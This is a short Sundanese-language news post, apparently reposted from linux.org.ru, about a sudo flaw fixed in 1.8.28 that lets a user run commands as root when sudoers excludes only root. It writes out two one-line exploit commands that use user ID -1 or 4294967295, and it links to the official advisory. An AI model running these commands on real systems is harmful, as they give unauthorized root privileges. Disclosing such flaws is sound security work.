Kutu dina sudo ngamungkinkeun anjeun ngaéksekusi file anu tiasa dieksekusi salaku root upami /etc/sudoers ngamungkinkeun éta dieksekusi ku pangguna sanés sareng dilarang pikeun root.
Eksploitasi kasalahan saderhana pisan:
sudo -u#-1 id -u
atawa:
sudo -u # 4294967295 id -u
Kasalahan aya dina sadaya vérsi sudo sateuacan 1.8.28
Rincian:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
sumber: linux.org.ru